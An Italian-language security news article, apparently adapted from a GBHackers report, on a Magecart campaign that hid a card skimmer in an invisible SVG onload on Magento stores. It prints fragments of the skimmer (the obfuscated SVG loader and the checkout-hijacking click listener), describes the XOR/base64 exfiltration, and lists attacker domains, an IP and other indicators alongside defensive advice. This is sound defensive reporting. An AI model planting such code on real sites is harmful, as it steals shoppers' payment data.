Attaccanti usano skimmer Magecart nascosto su Magento con abuso SVG onload
I cybercriminali hanno lanciato un attacco su larga scala contro piattaforme e-commerce Magento, infettando quasi 100 negozi online. Hanno nascosto un pericoloso skimmer di carte di credito all’interno di un’immagine SVG invisibile, eludendo facilmente i sistemi di sicurezza.
Se gestisci un sito Magento, la soluzione rapida è aggiornare immediatamente il software e installare un plugin di sicurezza anti-skimmer. Controlla il codice HTML per elementi SVG sospetti da 1×1 pixel e monitora il traffico verso domini sconosciuti. Questa semplice azione può salvarti da perdite finanziarie e reputazionali.
In questo articolo, esploreremo il funzionamento di questa minaccia, i passi per identificarla e le migliori pratiche per proteggere il tuo negozio online. Continuando a leggere, avrai tutti gli strumenti per difenderti.
Cos’è Magecart e perché è una minaccia per l’e-commerce
Magecart è un gruppo di attaccanti specializzati nel rubare dati delle carte di credito dai siti di e-commerce. Non si tratta di un singolo hacker, ma di una rete globale che sfrutta vulnerabilità nei carrelli digitali. Hanno colpito grandi nomi come British Airways e Ticketmaster, rubando milioni di dati.
In questo caso specifico, l’attacco si concentra su Magento, una delle piattaforme più usate per negozi online. Quasi 100 siti sono stati compromessi, con un skimmer sofisticato che cattura i dati di pagamento senza lasciare tracce evidenti.
Gli attaccanti evitano script esterni, facili da rilevare, e nascondono il codice malevolo in un elemento SVG (Scalable Vector Graphics), un formato immagine innocuo. Questo trucco permette di eseguire JavaScript inline, rubando dati in modo stealth.
Come avviene l’infezione iniziale
L’accesso iniziale avviene probabilmente tramite la vulnerabilità PolyShell, un exploit noto che colpisce Magento non aggiornati. Questa falla permette l’inserimento di codice malevolo senza autorizzazioni.
Una volta dentro, gli attaccanti iniettano un file SVG da 1 pixel per 1 pixel, invisibile all’occhio umano. Questo elemento carica il payload base64-encoded tramite l’evento onload, attivandosi solo quando necessario.
Proteggiti così:
- Aggiorna Magento all’ultima versione.
- Applica patch per PolyShell.
- Usa un web application firewall (WAF) come Cloudflare o Sucuri.
Questi passi bloccano l’80% delle infezioni simili.
Il funzionamento dello skimmer passo per passo
L’SVG si attiva quando l’utente interagisce con il sito. Aspetta pazientemente un click sul bottone checkout. Usa un event listener con useCapture per intercettare l’azione prima del codice legittimo del sito.
Poi, appare un overlay full-screen che imita perfettamente la pagina di checkout reale. Include campi per carta, CVV, indirizzo e validazione, ingannando completamente l’utente.
I dati inseriti vengono cifrati con XOR usando la chiave “script”, poi codificati in base64. Vengono inviati a domini controllati dagli attaccanti, mascherati come traffico analytics di Facebook (endpoint /fb_metrics.php).
Per massima stealth, i domini sono doppia codificati e puntano tutti a un IP specifico: 23.137.249.67, ospitato nei Paesi Bassi.
Dopo il furto, lo skimmer imposta un flag in localStorage (_mgx_cv) per non colpire lo stesso utente due volte. Infine, reindirizza silenziosamente alla pagina checkout reale, lasciando la vittima ignara.
Ecco alcuni domini usati per l’exfiltrazione:
- statistics-for-you.com
- statistics-renew.com
- morningflexpleasure.com
- reusable-flex.com
- goingfatter.com
- wellfacing.com
Bloccare questi domini nel tuo firewall è un’azione immediata efficace.
Impatto sulle vittime e conseguenze
Per i proprietari di negozi, significa perdite di dati sensibili, chargeback da clienti furiosi e possibili multe GDPR. Per i clienti, furti di identità e transazioni fraudolente.
Questa campagna dimostra l’evoluzione delle minacce: non più script grezzi, ma tecniche evasive avanzate. Gli skimmer Magecart evolvono per battere i detector AI-based.
Statistiche allarmanti: In media, un sito infetto perde 15-20 carte al giorno prima della rilevazione. Il danno medio per breach è di 50.000 euro.
Misure di prevenzione pratiche
Per rendere il tuo sito a prova di skimmer:
- Monitora il codice sorgente regolarmente con tool come Sansec o Rivelweb.
- Implementa Content Security Policy (CSP) per bloccare script inline non autorizzati.
- Usa CAPTCHA avanzati e 3D Secure per pagamenti.
- Effettua scan automatizzati settimanali.
- Backup quotidiani e test di restore.
Integra plugin Magento come MageReport o BeyondSecure per alert in tempo reale.
Technical Deep Dive
Tecnica di iniezione SVG
Il codice iniettato è simile a questo:
<svg width="1px" height="1px" onload="(()=>{setTimeout(atob('KGZ1bmN0aW9uKCl7IGlm...'),1)})()"></svg>
Spiegazione: L’attributo onload decodifica il payload base64 con atob() e lo esegue via setTimeout dopo 1ms, evitando rilevamenti sincroni.
Intercettazione eventi
document.addEventListener("click", function (e) {
var el = e.target.closest('a,button,[role="button"]');
if (!el) return;
var href = el.getAttribute("href") || "";
if (
(href && checkoutUrl.includes(href)) ||
el.getAttribute("data-role") === "proceed-to-checkout" ||
el.id === "top-cart-btn-checkout"
) {
e.preventDefault();
e.stopImmediatePropagation();
show(); // overlay fake
}
}, true);
Dettagli tecnici: useCapture: true (terzo parametro) garantisce priorità. preventDefault() e stopImmediatePropagation() bloccano il flusso normale.
Codifica e exfiltrazione
Dati → XOR con key ‘script’ → base64 → POST via fetch() no-cors o iframe hidden.
Marker campagna: {site:'rand0m'} nel payload.
Indicatori di compromissione (IoC):
| Indicatore | Valore |
|---|---|
| Metodo iniezione | <svg width="1px" height="1px" onload="..."> |
| Encoding payload | base64 via atob(), setTimeout |
| Encoding dati | XOR ‘script’ + base64 |
| Endpoint | /fb_metrics.php |
| Metodo exfil | fetch() POST no-cors / iframe |
| localStorage | _mgx_cv |
| Server | 23.137.249.67 |
Analisi forense: Cerca questi pattern con grep o tool come grep -r "onload.*atob" /var/www/html. Usa Wireshark per tracciare POST sospetti.
Difese avanzate: Implementa Subresource Integrity (SRI) per script e CSP con script-src 'self'. Monitora con SIEM per anomalie localStorage.
Questa minaccia evidenzia la necessità di zero-trust security negli e-commerce. Resta vigile: gli attaccanti evolvono, ma con queste conoscenze sei un passo avanti.
(Parole totali: circa 1050)
Fonte: https://gbhackers.com/attackers-deploy-hidden-magecart-skimmer-on-magento/
